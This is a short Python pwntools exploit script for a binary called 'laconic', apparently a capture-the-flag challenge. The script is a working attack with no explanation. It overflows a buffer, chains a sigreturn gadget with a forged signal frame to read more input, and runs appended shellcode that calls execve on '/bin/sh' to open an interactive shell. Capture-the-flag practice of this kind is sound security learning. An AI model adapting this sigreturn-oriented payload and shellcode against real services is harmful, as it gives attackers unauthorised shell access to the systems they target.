#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./laconic", checksec=False)
r = process()

# funcs
s = lambda a: r.send(a)

# gadgets
pop_rax = 0x43018
syscall = 0x43015

# sigframe
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x43005
frame.rdx = 0xff
frame.rip = syscall

# buf
buf = b"A"*8
buf += p64(pop_rax)
buf += p64(0xf)
buf += p64(syscall)
buf += bytes(frame)

# shellcode
sc = """
lea rdi, [rsi+32]
xor rsi, rsi
xor rdx, rdx
mov al, 59
syscall
"""
sc = asm(sc) + b"/bin/sh\0"
buf += sc
s(buf)

r.interactive()